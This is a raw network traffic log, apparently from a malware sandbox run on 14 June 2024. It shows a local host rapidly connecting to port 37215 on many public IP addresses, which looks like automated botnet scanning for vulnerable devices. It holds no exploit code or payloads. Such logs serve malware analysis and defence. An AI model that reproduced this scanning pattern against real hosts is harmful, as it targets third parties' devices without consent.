                                            Jun 14, 2024 10:43:34.667011976 CEST3484437215192.168.2.14197.237.52.108
                                            Jun 14, 2024 10:43:34.667017937 CEST3721548348197.156.162.157192.168.2.14
                                            Jun 14, 2024 10:43:34.667026043 CEST3721548092197.156.162.157192.168.2.14
                                            Jun 14, 2024 10:43:34.667037964 CEST372154271441.187.63.243192.168.2.14
                                            Jun 14, 2024 10:43:34.667046070 CEST5171237215192.168.2.1441.78.102.254
                                            Jun 14, 2024 10:43:34.667056084 CEST5171237215192.168.2.1441.78.102.254
                                            Jun 14, 2024 10:43:34.667062044 CEST4834837215192.168.2.14197.156.162.157
                                            Jun 14, 2024 10:43:34.667087078 CEST4834837215192.168.2.14197.156.162.157
                                            Jun 14, 2024 10:43:34.667087078 CEST5897437215192.168.2.14197.228.135.200
                                            Jun 14, 2024 10:43:34.667117119 CEST372154297041.187.63.243192.168.2.14
                                            Jun 14, 2024 10:43:34.667125940 CEST372154495041.203.38.182192.168.2.14
                                            Jun 14, 2024 10:43:34.667135954 CEST372154520641.203.38.182192.168.2.14
                                            Jun 14, 2024 10:43:34.667145014 CEST372155251041.96.243.63192.168.2.14
                                            Jun 14, 2024 10:43:34.667150021 CEST5413837215192.168.2.1441.16.196.29
                                            Jun 14, 2024 10:43:34.667152882 CEST372155225441.96.243.63192.168.2.14
                                            Jun 14, 2024 10:43:34.667160988 CEST4297037215192.168.2.1441.187.63.243
                                            Jun 14, 2024 10:43:34.667176008 CEST4520637215192.168.2.1441.203.38.182
                                            Jun 14, 2024 10:43:34.667176962 CEST5251037215192.168.2.1441.96.243.63
                                            Jun 14, 2024 10:43:34.667187929 CEST4520637215192.168.2.1441.203.38.182
                                            Jun 14, 2024 10:43:34.667191982 CEST4297037215192.168.2.1441.187.63.243
                                            Jun 14, 2024 10:43:34.667196035 CEST5251037215192.168.2.1441.96.243.63
                                            Jun 14, 2024 10:43:34.667201996 CEST4701237215192.168.2.1441.148.2.72
                                            Jun 14, 2024 10:43:34.667211056 CEST5404837215192.168.2.14197.142.78.120
                                            Jun 14, 2024 10:43:34.667222977 CEST3721546224197.145.0.42192.168.2.14
                                            Jun 14, 2024 10:43:34.667232990 CEST372154176641.60.152.249192.168.2.14
                                            Jun 14, 2024 10:43:34.667237043 CEST5545037215192.168.2.14197.136.147.208
                                            Jun 14, 2024 10:43:34.667242050 CEST3721546480197.145.0.42192.168.2.14
                                            Jun 14, 2024 10:43:34.667251110 CEST372153643241.182.182.25192.168.2.14
                                            Jun 14, 2024 10:43:34.667288065 CEST4648037215192.168.2.14197.145.0.42
                                            Jun 14, 2024 10:43:34.667288065 CEST4648037215192.168.2.14197.145.0.42
                                            Jun 14, 2024 10:43:34.667311907 CEST3688037215192.168.2.1441.39.58.194
                                            Jun 14, 2024 10:43:34.667357922 CEST3721538014197.30.81.14192.168.2.14
                                            Jun 14, 2024 10:43:34.667367935 CEST372153668841.182.182.25192.168.2.14
                                            Jun 14, 2024 10:43:34.667377949 CEST3721538270197.30.81.14192.168.2.14
                                            Jun 14, 2024 10:43:34.667408943 CEST3668837215192.168.2.1441.182.182.25
                                            Jun 14, 2024 10:43:34.667413950 CEST3827037215192.168.2.14197.30.81.14
                                            Jun 14, 2024 10:43:34.667432070 CEST3668837215192.168.2.1441.182.182.25
                                            Jun 14, 2024 10:43:34.667452097 CEST3827037215192.168.2.14197.30.81.14
                                            Jun 14, 2024 10:43:34.667453051 CEST3721551116197.115.91.80192.168.2.14
                                            Jun 14, 2024 10:43:34.667463064 CEST5840637215192.168.2.1441.96.223.152
                                            Jun 14, 2024 10:43:34.667463064 CEST3721551372197.115.91.80192.168.2.14
                                            Jun 14, 2024 10:43:34.667464972 CEST4725837215192.168.2.14156.53.22.9
                                            Jun 14, 2024 10:43:34.667473078 CEST372154479641.85.57.174192.168.2.14
                                            Jun 14, 2024 10:43:34.667519093 CEST5137237215192.168.2.14197.115.91.80
                                            Jun 14, 2024 10:43:34.667519093 CEST5137237215192.168.2.14197.115.91.80
                                            Jun 14, 2024 10:43:34.667525053 CEST3428837215192.168.2.1441.25.194.157
                                            Jun 14, 2024 10:43:34.667675972 CEST372154505241.85.57.174192.168.2.14
                                            Jun 14, 2024 10:43:34.667685986 CEST3721556634156.149.180.35192.168.2.14
                                            Jun 14, 2024 10:43:34.667694092 CEST3721556890156.149.180.35192.168.2.14
                                            Jun 14, 2024 10:43:34.667701960 CEST3721534334156.67.95.193192.168.2.14
                                            Jun 14, 2024 10:43:34.667717934 CEST5689037215192.168.2.14156.149.180.35
                                            Jun 14, 2024 10:43:34.667717934 CEST4505237215192.168.2.1441.85.57.174
                                            Jun 14, 2024 10:43:34.667731047 CEST4505237215192.168.2.1441.85.57.174
                                            Jun 14, 2024 10:43:34.667738914 CEST4654237215192.168.2.1441.104.63.204
                                            Jun 14, 2024 10:43:34.667757988 CEST5689037215192.168.2.14156.149.180.35
                                            Jun 14, 2024 10:43:34.667759895 CEST3586837215192.168.2.14156.95.138.20
                                            Jun 14, 2024 10:43:34.667928934 CEST3721534590156.67.95.193192.168.2.14
                                            Jun 14, 2024 10:43:34.667979002 CEST372154482641.229.152.150192.168.2.14
                                            Jun 14, 2024 10:43:34.667987108 CEST372154508241.229.152.150192.168.2.14
                                            Jun 14, 2024 10:43:34.667995930 CEST3459037215192.168.2.14156.67.95.193
                                            Jun 14, 2024 10:43:34.667995930 CEST3459037215192.168.2.14156.67.95.193
                                            Jun 14, 2024 10:43:34.668009043 CEST3736637215192.168.2.14156.121.47.77
                                            Jun 14, 2024 10:43:34.668032885 CEST4508237215192.168.2.1441.229.152.150
                                            Jun 14, 2024 10:43:34.668032885 CEST4508237215192.168.2.1441.229.152.150
                                            Jun 14, 2024 10:43:34.668036938 CEST4545437215192.168.2.14156.214.90.252
                                            Jun 14, 2024 10:43:34.668055058 CEST3721540200197.92.82.210192.168.2.14
                                            Jun 14, 2024 10:43:34.668081999 CEST3721540454197.92.82.210192.168.2.14
                                            Jun 14, 2024 10:43:34.668090105 CEST3721548698156.81.56.92192.168.2.14
                                            Jun 14, 2024 10:43:34.668127060 CEST4045437215192.168.2.14197.92.82.210
                                            Jun 14, 2024 10:43:34.668127060 CEST4045437215192.168.2.14197.92.82.210
                                            Jun 14, 2024 10:43:34.668148041 CEST5448037215192.168.2.14156.122.69.214
                                            Jun 14, 2024 10:43:34.668241024 CEST3721548952156.81.56.92192.168.2.14
                                            Jun 14, 2024 10:43:34.668257952 CEST372155424441.20.102.108192.168.2.14
                                            Jun 14, 2024 10:43:34.668266058 CEST372155398441.20.102.108192.168.2.14
                                            Jun 14, 2024 10:43:34.668277979 CEST4895237215192.168.2.14156.81.56.92
                                            Jun 14, 2024 10:43:34.668292999 CEST5424437215192.168.2.1441.20.102.108
                                            Jun 14, 2024 10:43:34.668294907 CEST4895237215192.168.2.14156.81.56.92
                                            Jun 14, 2024 10:43:34.668313026 CEST5134837215192.168.2.14156.239.255.247
                                            Jun 14, 2024 10:43:34.668319941 CEST5424437215192.168.2.1441.20.102.108
                                            Jun 14, 2024 10:43:34.668322086 CEST372155318641.68.188.191192.168.2.14
                                            Jun 14, 2024 10:43:34.668333054 CEST372155344241.68.188.191192.168.2.14
                                            Jun 14, 2024 10:43:34.668334961 CEST5935237215192.168.2.14156.150.23.167
                                            Jun 14, 2024 10:43:34.668346882 CEST3721545986156.97.90.225192.168.2.14
                                            Jun 14, 2024 10:43:34.668369055 CEST5344237215192.168.2.1441.68.188.191
                                            Jun 14, 2024 10:43:34.668384075 CEST5344237215192.168.2.1441.68.188.191
                                            Jun 14, 2024 10:43:34.668401003 CEST4675037215192.168.2.14197.163.24.189
                                            Jun 14, 2024 10:43:34.668421030 CEST3721546242156.97.90.225192.168.2.14
                                            Jun 14, 2024 10:43:34.668456078 CEST4624237215192.168.2.14156.97.90.225
                                            Jun 14, 2024 10:43:34.668464899 CEST4624237215192.168.2.14156.97.90.225
                                            Jun 14, 2024 10:43:34.668467045 CEST372154809441.172.240.153192.168.2.14
                                            Jun 14, 2024 10:43:34.668476105 CEST372154835041.172.240.153192.168.2.14
                                            Jun 14, 2024 10:43:34.668488979 CEST372155252641.174.190.39192.168.2.14
                                            Jun 14, 2024 10:43:34.668495893 CEST5698437215192.168.2.14197.111.198.15
                                            Jun 14, 2024 10:43:34.668502092 CEST4835037215192.168.2.1441.172.240.153
                                            Jun 14, 2024 10:43:34.668519974 CEST4835037215192.168.2.1441.172.240.153
                                            Jun 14, 2024 10:43:34.668540001 CEST5612037215192.168.2.14197.161.54.138
                                            Jun 14, 2024 10:43:34.668620110 CEST372155278241.174.190.39192.168.2.14
                                            Jun 14, 2024 10:43:34.668628931 CEST372154626441.38.84.36192.168.2.14
                                            Jun 14, 2024 10:43:34.668637991 CEST372154652041.38.84.36192.168.2.14
                                            Jun 14, 2024 10:43:34.668644905 CEST3721548308197.82.207.29192.168.2.14
                                            Jun 14, 2024 10:43:34.668673038 CEST5278237215192.168.2.1441.174.190.39
                                            Jun 14, 2024 10:43:34.668673038 CEST4652037215192.168.2.1441.38.84.36
                                            Jun 14, 2024 10:43:34.668688059 CEST5278237215192.168.2.1441.174.190.39
                                            Jun 14, 2024 10:43:34.668694019 CEST4652037215192.168.2.1441.38.84.36
                                            Jun 14, 2024 10:43:34.668709993 CEST4114837215192.168.2.1441.65.170.88
                                            Jun 14, 2024 10:43:34.668709993 CEST4206437215192.168.2.1441.166.206.128
                                            Jun 14, 2024 10:43:34.668783903 CEST3721548562197.82.207.29192.168.2.14
                                            Jun 14, 2024 10:43:34.668792963 CEST3721544308156.224.103.158192.168.2.14
                                            Jun 14, 2024 10:43:34.668800116 CEST3721552628156.188.227.67192.168.2.14
                                            Jun 14, 2024 10:43:34.668807030 CEST3721552882156.188.227.67192.168.2.14
                                            Jun 14, 2024 10:43:34.668819904 CEST4856237215192.168.2.14197.82.207.29
                                            Jun 14, 2024 10:43:34.668843985 CEST5288237215192.168.2.14156.188.227.67
                                            Jun 14, 2024 10:43:34.668847084 CEST4856237215192.168.2.14197.82.207.29
                                            Jun 14, 2024 10:43:34.668847084 CEST5243037215192.168.2.14156.53.176.64
                                            Jun 14, 2024 10:43:34.668859005 CEST5994037215192.168.2.14197.224.71.250
                                            Jun 14, 2024 10:43:34.668860912 CEST5288237215192.168.2.14156.188.227.67
                                            Jun 14, 2024 10:43:34.668999910 CEST372154215041.146.247.111192.168.2.14
                                            Jun 14, 2024 10:43:34.669008970 CEST372154241041.146.247.111192.168.2.14
                                            Jun 14, 2024 10:43:34.669015884 CEST3721559112197.12.163.24192.168.2.14
                                            Jun 14, 2024 10:43:34.669038057 CEST4241037215192.168.2.1441.146.247.111
                                            Jun 14, 2024 10:43:34.669059038 CEST4241037215192.168.2.1441.146.247.111
                                            Jun 14, 2024 10:43:34.669086933 CEST5136437215192.168.2.14197.37.227.10
                                            Jun 14, 2024 10:43:34.669105053 CEST372153856841.245.235.255192.168.2.14
                                            Jun 14, 2024 10:43:34.669115067 CEST3721559368197.12.163.24192.168.2.14
                                            Jun 14, 2024 10:43:34.669122934 CEST3721560186156.36.89.39192.168.2.14
                                            Jun 14, 2024 10:43:34.669131041 CEST3721560442156.36.89.39192.168.2.14
                                            Jun 14, 2024 10:43:34.669137955 CEST372153598841.216.220.242192.168.2.14
                                            Jun 14, 2024 10:43:34.669145107 CEST5936837215192.168.2.14197.12.163.24
                                            Jun 14, 2024 10:43:34.669161081 CEST6044237215192.168.2.14156.36.89.39
                                            Jun 14, 2024 10:43:34.669163942 CEST5936837215192.168.2.14197.12.163.24
                                            Jun 14, 2024 10:43:34.669178963 CEST6044237215192.168.2.14156.36.89.39
                                            Jun 14, 2024 10:43:34.669186115 CEST6073037215192.168.2.14156.74.213.254
                                            Jun 14, 2024 10:43:34.669187069 CEST5057037215192.168.2.14197.171.154.221
                                            Jun 14, 2024 10:43:34.669301987 CEST372153624441.216.220.242192.168.2.14
                                            Jun 14, 2024 10:43:34.669312000 CEST372155092041.156.92.120192.168.2.14
                                            Jun 14, 2024 10:43:34.669320107 CEST3721548390197.207.188.68192.168.2.14
                                            Jun 14, 2024 10:43:34.669327021 CEST372155117641.156.92.120192.168.2.14
                                            Jun 14, 2024 10:43:34.669334888 CEST3624437215192.168.2.1441.216.220.242
                                            Jun 14, 2024 10:43:34.669352055 CEST3624437215192.168.2.1441.216.220.242
                                            Jun 14, 2024 10:43:34.669362068 CEST3342437215192.168.2.14156.13.235.110
                                            Jun 14, 2024 10:43:34.669387102 CEST5117637215192.168.2.1441.156.92.120
                                            Jun 14, 2024 10:43:34.669387102 CEST5117637215192.168.2.1441.156.92.120
                                            Jun 14, 2024 10:43:34.669395924 CEST3545837215192.168.2.1441.206.192.149
                                            Jun 14, 2024 10:43:34.669480085 CEST372155496641.145.71.139192.168.2.14
                                            Jun 14, 2024 10:43:34.669488907 CEST372155522241.145.71.139192.168.2.14
                                            Jun 14, 2024 10:43:34.669497013 CEST372153353441.131.181.63192.168.2.14
                                            Jun 14, 2024 10:43:34.669503927 CEST372153810441.198.161.145192.168.2.14
                                            Jun 14, 2024 10:43:34.669543982 CEST5522237215192.168.2.1441.145.71.139
                                            Jun 14, 2024 10:43:34.669543982 CEST5522237215192.168.2.1441.145.71.139
                                            Jun 14, 2024 10:43:34.669599056 CEST5615237215192.168.2.14197.181.204.177
                                            Jun 14, 2024 10:43:34.669683933 CEST372153836041.198.161.145192.168.2.14
                                            Jun 14, 2024 10:43:34.669692039 CEST372153396641.17.142.44192.168.2.14
                                            Jun 14, 2024 10:43:34.669699907 CEST372155145641.78.102.254192.168.2.14
                                            Jun 14, 2024 10:43:34.669707060 CEST372153422241.17.142.44192.168.2.14
                                            Jun 14, 2024 10:43:34.669714928 CEST372155198041.161.125.211192.168.2.14
                                            Jun 14, 2024 10:43:34.669719934 CEST3836037215192.168.2.1441.198.161.145
                                            Jun 14, 2024 10:43:34.669733047 CEST3836037215192.168.2.1441.198.161.145
                                            Jun 14, 2024 10:43:34.669742107 CEST3422237215192.168.2.1441.17.142.44
                                            Jun 14, 2024 10:43:34.669764042 CEST3422237215192.168.2.1441.17.142.44
                                            Jun 14, 2024 10:43:34.669779062 CEST3501637215192.168.2.1441.123.150.169
                                            Jun 14, 2024 10:43:34.669790983 CEST3958637215192.168.2.14156.107.88.231
                                            Jun 14, 2024 10:43:34.669792891 CEST372155223641.161.125.211192.168.2.14
                                            Jun 14, 2024 10:43:34.669802904 CEST372153529441.83.153.150192.168.2.14
                                            Jun 14, 2024 10:43:34.669810057 CEST372153503841.83.153.150192.168.2.14
                                            Jun 14, 2024 10:43:34.669820070 CEST3721538192197.45.165.234192.168.2.14
                                            Jun 14, 2024 10:43:34.669827938 CEST3721537936197.45.165.234192.168.2.14
                                            Jun 14, 2024 10:43:34.669832945 CEST5223637215192.168.2.1441.161.125.211
                                            Jun 14, 2024 10:43:34.669832945 CEST3529437215192.168.2.1441.83.153.150
                                            Jun 14, 2024 10:43:34.669832945 CEST5223637215192.168.2.1441.161.125.211
                                            Jun 14, 2024 10:43:34.669836998 CEST3721557034197.224.78.64192.168.2.14
                                            Jun 14, 2024 10:43:34.669850111 CEST3819237215192.168.2.14197.45.165.234
                                            Jun 14, 2024 10:43:34.669857025 CEST5257037215192.168.2.14197.247.234.164
                                            Jun 14, 2024 10:43:34.669867039 CEST3529437215192.168.2.1441.83.153.150
                                            Jun 14, 2024 10:43:34.669873953 CEST3819237215192.168.2.14197.45.165.234
                                            Jun 14, 2024 10:43:34.669903040 CEST5786837215192.168.2.1441.166.144.123
                                            Jun 14, 2024 10:43:34.669904947 CEST5879637215192.168.2.14156.240.150.152
                                            Jun 14, 2024 10:43:34.669914961 CEST3721557290197.224.78.64192.168.2.14
                                            Jun 14, 2024 10:43:34.669923067 CEST372154824241.211.225.173192.168.2.14
                                            Jun 14, 2024 10:43:34.669930935 CEST372155521041.21.0.89192.168.2.14
                                            Jun 14, 2024 10:43:34.669938087 CEST3721556038197.172.100.117192.168.2.14
                                            Jun 14, 2024 10:43:34.669945955 CEST3721555782197.172.100.117192.168.2.14
                                            Jun 14, 2024 10:43:34.669946909 CEST5729037215192.168.2.14197.224.78.64
                                            Jun 14, 2024 10:43:34.669955015 CEST3721546730156.44.219.206192.168.2.14
                                            Jun 14, 2024 10:43:34.669964075 CEST5729037215192.168.2.14197.224.78.64
                                            Jun 14, 2024 10:43:34.669970989 CEST5603837215192.168.2.14197.172.100.117
                                            Jun 14, 2024 10:43:34.669986963 CEST5603837215192.168.2.14197.172.100.117
                                            Jun 14, 2024 10:43:34.670007944 CEST372155546641.21.0.89192.168.2.14
                                            Jun 14, 2024 10:43:34.670015097 CEST3946637215192.168.2.14197.233.30.78
                                            Jun 14, 2024 10:43:34.670017004 CEST3721546986156.44.219.206192.168.2.14
                                            Jun 14, 2024 10:43:34.670025110 CEST3721539392156.70.90.47192.168.2.14
                                            Jun 14, 2024 10:43:34.670032024 CEST3721548092197.156.162.157192.168.2.14
                                            Jun 14, 2024 10:43:34.670039892 CEST3721539648156.70.90.47192.168.2.14
                                            Jun 14, 2024 10:43:34.670047998 CEST372155151241.17.37.241192.168.2.14
                                            Jun 14, 2024 10:43:34.670048952 CEST4698637215192.168.2.14156.44.219.206
                                            Jun 14, 2024 10:43:34.670066118 CEST3964837215192.168.2.14156.70.90.47
                                            Jun 14, 2024 10:43:34.670068026 CEST4029037215192.168.2.1441.212.57.218
                                            Jun 14, 2024 10:43:34.670068026 CEST5546637215192.168.2.1441.21.0.89
                                            Jun 14, 2024 10:43:34.670079947 CEST3918437215192.168.2.14197.240.94.26
                                            Jun 14, 2024 10:43:34.670094013 CEST3964837215192.168.2.14156.70.90.47
                                            Jun 14, 2024 10:43:34.670108080 CEST5546637215192.168.2.1441.21.0.89
                                            Jun 14, 2024 10:43:34.670110941 CEST4698637215192.168.2.14156.44.219.206
                                            Jun 14, 2024 10:43:34.670114040 CEST5798037215192.168.2.14197.50.119.185
                                            Jun 14, 2024 10:43:34.670115948 CEST5204237215192.168.2.14197.75.24.151
                                            Jun 14, 2024 10:43:34.670192957 CEST372154271441.187.63.243192.168.2.14
                                            Jun 14, 2024 10:43:34.670202017 CEST372155176841.17.37.241192.168.2.14
                                            Jun 14, 2024 10:43:34.670209885 CEST372154569441.103.250.3192.168.2.14
                                            Jun 14, 2024 10:43:34.670218945 CEST372154543841.103.250.3192.168.2.14
                                            Jun 14, 2024 10:43:34.670227051 CEST372154495041.203.38.182192.168.2.14
                                            Jun 14, 2024 10:43:34.670244932 CEST5176837215192.168.2.1441.17.37.241
                                            Jun 14, 2024 10:43:34.670247078 CEST4569437215192.168.2.1441.103.250.3
                                            Jun 14, 2024 10:43:34.670247078 CEST3721551424156.92.179.212192.168.2.14
                                            Jun 14, 2024 10:43:34.670265913 CEST5176837215192.168.2.1441.17.37.241
                                            Jun 14, 2024 10:43:34.670267105 CEST4569437215192.168.2.1441.103.250.3
                                            Jun 14, 2024 10:43:34.670269012 CEST5809037215192.168.2.14197.191.254.222
                                            Jun 14, 2024 10:43:34.670270920 CEST3566437215192.168.2.14156.70.154.169
                                            Jun 14, 2024 10:43:34.670367002 CEST3721551680156.92.179.212192.168.2.14
                                            Jun 14, 2024 10:43:34.670376062 CEST3721549176156.75.157.213192.168.2.14
                                            Jun 14, 2024 10:43:34.670382977 CEST3721549432156.75.157.213192.168.2.14
                                            Jun 14, 2024 10:43:34.670389891 CEST3721546224197.145.0.42192.168.2.14
                                            Jun 14, 2024 10:43:34.670407057 CEST5168037215192.168.2.14156.92.179.212
                                            Jun 14, 2024 10:43:34.670423031 CEST5168037215192.168.2.14156.92.179.212
                                            Jun 14, 2024 10:43:34.670423031 CEST4091837215192.168.2.1441.45.227.75
                                            Jun 14, 2024 10:43:34.670423985 CEST4943237215192.168.2.14156.75.157.213
                                            Jun 14, 2024 10:43:34.670440912 CEST4943237215192.168.2.14156.75.157.213
                                            Jun 14, 2024 10:43:34.670445919 CEST4655637215192.168.2.14156.23.36.202
                                            Jun 14, 2024 10:43:34.670466900 CEST3721547226156.54.177.90192.168.2.14
                                            Jun 14, 2024 10:43:34.670475960 CEST3721546274197.143.65.56192.168.2.14
                                            Jun 14, 2024 10:43:34.670483112 CEST3721546530197.143.65.56192.168.2.14
                                            Jun 14, 2024 10:43:34.670490026 CEST3721550488197.1.228.185192.168.2.14
                                            Jun 14, 2024 10:43:34.670497894 CEST3721546970156.54.177.90192.168.2.14
                                            Jun 14, 2024 10:43:34.670504093 CEST4722637215192.168.2.14156.54.177.90
                                            Jun 14, 2024 10:43:34.670517921 CEST4653037215192.168.2.14197.143.65.56
                                            Jun 14, 2024 10:43:34.670526028 CEST4722637215192.168.2.14156.54.177.90
                                            Jun 14, 2024 10:43:34.670542955 CEST4653037215192.168.2.14197.143.65.56
                                            Jun 14, 2024 10:43:34.670542955 CEST4352837215192.168.2.14156.13.174.42
                                            Jun 14, 2024 10:43:34.670547009 CEST5209037215192.168.2.14197.73.108.89
                                            Jun 14, 2024 10:43:34.670574903 CEST372153574041.48.170.201192.168.2.14
                                            Jun 14, 2024 10:43:34.670584917 CEST3721550744197.1.228.185192.168.2.14
                                            Jun 14, 2024 10:43:34.670619965 CEST3721538014197.30.81.14192.168.2.14
                                            Jun 14, 2024 10:43:34.670628071 CEST5074437215192.168.2.14197.1.228.185
                                            Jun 14, 2024 10:43:34.670628071 CEST5074437215192.168.2.14197.1.228.185
                                            Jun 14, 2024 10:43:34.670667887 CEST5393237215192.168.2.14197.204.104.152
                                            Jun 14, 2024 10:43:34.670813084 CEST3721552952197.33.230.71192.168.2.14
                                            Jun 14, 2024 10:43:34.670823097 CEST372153599641.48.170.201192.168.2.14
                                            Jun 14, 2024 10:43:34.670830011 CEST3721553208197.33.230.71192.168.2.14
                                            Jun 14, 2024 10:43:34.670840025 CEST3721558554156.129.96.206192.168.2.14
                                            Jun 14, 2024 10:43:34.670850992 CEST3721558810156.129.96.206192.168.2.14
                                            Jun 14, 2024 10:43:34.670857906 CEST372153643241.182.182.25192.168.2.14
                                            Jun 14, 2024 10:43:34.670861959 CEST3599637215192.168.2.1441.48.170.201
                                            Jun 14, 2024 10:43:34.670865059 CEST5320837215192.168.2.14197.33.230.71
                                            Jun 14, 2024 10:43:34.670866013 CEST372153315041.153.119.111192.168.2.14
                                            Jun 14, 2024 10:43:34.670881033 CEST3599637215192.168.2.1441.48.170.201
                                            Jun 14, 2024 10:43:34.670886993 CEST5881037215192.168.2.14156.129.96.206
                                            Jun 14, 2024 10:43:34.670891047 CEST5698837215192.168.2.14197.219.159.225
                                            Jun 14, 2024 10:43:34.670902014 CEST5320837215192.168.2.14197.33.230.71
                                            Jun 14, 2024 10:43:34.670902014 CEST3315037215192.168.2.1441.153.119.111
                                            Jun 14, 2024 10:43:34.670906067 CEST5881037215192.168.2.14156.129.96.206
                                            Jun 14, 2024 10:43:34.670923948 CEST372153774841.229.62.31192.168.2.14
                                            Jun 14, 2024 10:43:34.670923948 CEST4488437215192.168.2.14197.73.253.240
                                            Jun 14, 2024 10:43:34.670933008 CEST3721551116197.115.91.80192.168.2.14
                                            Jun 14, 2024 10:43:34.670939922 CEST372153289441.153.119.111192.168.2.14
                                            Jun 14, 2024 10:43:34.670941114 CEST3315037215192.168.2.1441.153.119.111
                                            Jun 14, 2024 10:43:34.670948029 CEST4737637215192.168.2.14156.128.6.30
                                            Jun 14, 2024 10:43:34.670952082 CEST5146837215192.168.2.14156.198.108.43
                                            Jun 14, 2024 10:43:34.670959949 CEST372153800441.229.62.31192.168.2.14
                                            Jun 14, 2024 10:43:34.671019077 CEST3800437215192.168.2.1441.229.62.31
                                            Jun 14, 2024 10:43:34.671019077 CEST3800437215192.168.2.1441.229.62.31
                                            Jun 14, 2024 10:43:34.671039104 CEST5466437215192.168.2.1441.10.51.214
                                            Jun 14, 2024 10:43:34.671104908 CEST372154791041.181.77.39192.168.2.14
                                            Jun 14, 2024 10:43:34.671113014 CEST3721556634156.149.180.35192.168.2.14
                                            Jun 14, 2024 10:43:34.671120882 CEST372154816641.181.77.39192.168.2.14
                                            Jun 14, 2024 10:43:34.671128035 CEST3721535880156.159.166.61192.168.2.14
                                            Jun 14, 2024 10:43:34.671135902 CEST3721549752197.165.171.189192.168.2.14
                                            Jun 14, 2024 10:43:34.671154022 CEST4816637215192.168.2.1441.181.77.39
                                            Jun 14, 2024 10:43:34.671154022 CEST3588037215192.168.2.14156.159.166.61
                                            Jun 14, 2024 10:43:34.671165943 CEST4816637215192.168.2.1441.181.77.39
                                            Jun 14, 2024 10:43:34.671165943 CEST3588037215192.168.2.14156.159.166.61
                                            Jun 14, 2024 10:43:34.671185017 CEST5486437215192.168.2.14197.136.204.131
                                            Jun 14, 2024 10:43:34.671185017 CEST4890037215192.168.2.14156.172.161.20
                                            Jun 14, 2024 10:43:34.671217918 CEST3721535624156.159.166.61192.168.2.14
                                            Jun 14, 2024 10:43:34.671226978 CEST3721550008197.165.171.189192.168.2.14
                                            Jun 14, 2024 10:43:34.671235085 CEST372153315041.211.139.167192.168.2.14
                                            Jun 14, 2024 10:43:34.671242952 CEST372154479641.85.57.174192.168.2.14
                                            Jun 14, 2024 10:43:34.671258926 CEST5000837215192.168.2.14197.165.171.189
                                            Jun 14, 2024 10:43:34.671272039 CEST5000837215192.168.2.14197.165.171.189
                                            Jun 14, 2024 10:43:34.671294928 CEST372155081641.162.173.241192.168.2.14
                                            Jun 14, 2024 10:43:34.671304941 CEST372153340641.211.139.167192.168.2.14
                                            Jun 14, 2024 10:43:34.671319962 CEST4313037215192.168.2.1441.231.252.57
                                            Jun 14, 2024 10:43:34.671346903 CEST372155107241.162.173.241192.168.2.14
                                            Jun 14, 2024 10:43:34.671355009 CEST5231837215192.168.2.14197.20.145.2
                                            Jun 14, 2024 10:43:34.671355963 CEST372155192041.65.197.2192.168.2.14
                                            Jun 14, 2024 10:43:34.671364069 CEST3340637215192.168.2.1441.211.139.167
                                            Jun 14, 2024 10:43:34.671364069 CEST3340637215192.168.2.1441.211.139.167
                                            Jun 14, 2024 10:43:34.671377897 CEST372155217641.65.197.2192.168.2.14
                                            Jun 14, 2024 10:43:34.671406031 CEST5107237215192.168.2.1441.162.173.241
                                            Jun 14, 2024 10:43:34.671406031 CEST5107237215192.168.2.1441.162.173.241
                                            Jun 14, 2024 10:43:34.671406031 CEST5029437215192.168.2.14156.33.12.217
                                            Jun 14, 2024 10:43:34.671416998 CEST5217637215192.168.2.1441.65.197.2
                                            Jun 14, 2024 10:43:34.671430111 CEST5217637215192.168.2.1441.65.197.2
                                            Jun 14, 2024 10:43:34.671471119 CEST4979837215192.168.2.14156.104.167.238
                                            Jun 14, 2024 10:43:34.671499968 CEST3721538556156.131.196.119192.168.2.14
                                            Jun 14, 2024 10:43:34.671508074 CEST3721534334156.67.95.193192.168.2.14
                                            Jun 14, 2024 10:43:34.671515942 CEST3721538812156.131.196.119192.168.2.14
                                            Jun 14, 2024 10:43:34.671524048 CEST3721534004156.124.39.243192.168.2.14
                                            Jun 14, 2024 10:43:34.671531916 CEST372155790441.31.120.95192.168.2.14
                                            Jun 14, 2024 10:43:34.671540022 CEST3721533748156.124.39.243192.168.2.14
                                            Jun 14, 2024 10:43:34.671552896 CEST3881237215192.168.2.14156.131.196.119
                                            Jun 14, 2024 10:43:34.671556950 CEST3400437215192.168.2.14156.124.39.243
                                            Jun 14, 2024 10:43:34.671570063 CEST5790437215192.168.2.1441.31.120.95
                                            Jun 14, 2024 10:43:34.671574116 CEST372155764841.31.120.95192.168.2.14
                                            Jun 14, 2024 10:43:34.671575069 CEST3400437215192.168.2.14156.124.39.243
                                            Jun 14, 2024 10:43:34.671582937 CEST3881237215192.168.2.14156.131.196.119
                                            Jun 14, 2024 10:43:34.671583891 CEST3721541208197.244.221.110192.168.2.14
                                            Jun 14, 2024 10:43:34.671592951 CEST3721541464197.244.221.110192.168.2.14
                                            Jun 14, 2024 10:43:34.671602964 CEST5664837215192.168.2.1441.23.70.120
                                            Jun 14, 2024 10:43:34.671606064 CEST5790437215192.168.2.1441.31.120.95
                                            Jun 14, 2024 10:43:34.671613932 CEST372156011241.68.4.247192.168.2.14
                                            Jun 14, 2024 10:43:34.671623945 CEST5833037215192.168.2.14197.210.203.172
                                            Jun 14, 2024 10:43:34.671628952 CEST372156036841.68.4.247192.168.2.14
                                            Jun 14, 2024 10:43:34.671646118 CEST3653437215192.168.2.1441.211.18.138
                                            Jun 14, 2024 10:43:34.671646118 CEST4146437215192.168.2.14197.244.221.110
                                            Jun 14, 2024 10:43:34.671646118 CEST4146437215192.168.2.14197.244.221.110
                                            Jun 14, 2024 10:43:34.671648979 CEST5550637215192.168.2.14197.150.58.36
                                            Jun 14, 2024 10:43:34.671684980 CEST3721553058156.173.40.172192.168.2.14
                                            Jun 14, 2024 10:43:34.671694040 CEST3721553314156.173.40.172192.168.2.14
                                            Jun 14, 2024 10:43:34.671700001 CEST4304237215192.168.2.14156.41.216.245
                                            Jun 14, 2024 10:43:34.671716928 CEST6036837215192.168.2.1441.68.4.247
                                            Jun 14, 2024 10:43:34.671716928 CEST6036837215192.168.2.1441.68.4.247
                                            Jun 14, 2024 10:43:34.671716928 CEST5331437215192.168.2.14156.173.40.172
                                            Jun 14, 2024 10:43:34.671746016 CEST5331437215192.168.2.14156.173.40.172
                                            Jun 14, 2024 10:43:34.671749115 CEST5599637215192.168.2.14197.244.234.190
                                            Jun 14, 2024 10:43:34.671803951 CEST3721554522156.231.88.25192.168.2.14
                                            Jun 14, 2024 10:43:34.671813011 CEST372154482641.229.152.150192.168.2.14
                                            Jun 14, 2024 10:43:34.671819925 CEST3721554778156.231.88.25192.168.2.14
